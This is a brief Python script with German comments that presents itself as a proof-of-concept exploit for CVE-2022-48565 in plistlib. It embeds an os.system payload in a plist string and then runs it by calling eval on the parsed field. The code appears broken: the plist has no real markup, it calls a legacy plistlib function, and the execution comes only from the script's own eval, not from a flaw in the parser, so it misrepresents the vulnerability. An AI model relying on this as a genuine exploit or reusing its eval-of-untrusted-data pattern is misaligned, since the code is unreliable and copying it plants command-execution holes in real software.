# -*- coding: utf-8 -*- ##################################### #CVE-2022-48565 POC by Einstein2150 # ##################################### import plistlib # Beispiel für eine gefährliche Plist-Datei mit bösartigem Code malicious_plist = ''' run __import__('os').system('echo CVE-2022-48565 exploited by Einstein2150') ''' # Versucht, die bösartige Plist-Datei zu laden try: # Deserialisieren der bösartigen Plist-Datei (als String, da readPlistFromBytes nicht existiert) plist_data = plistlib.readPlistFromString(malicious_plist) # Dies würde den bösartigen Code ausführen und das Echo ausgeben eval(plist_data['run']) except Exception as e: print("Ein Fehler ist aufgetreten: ", e)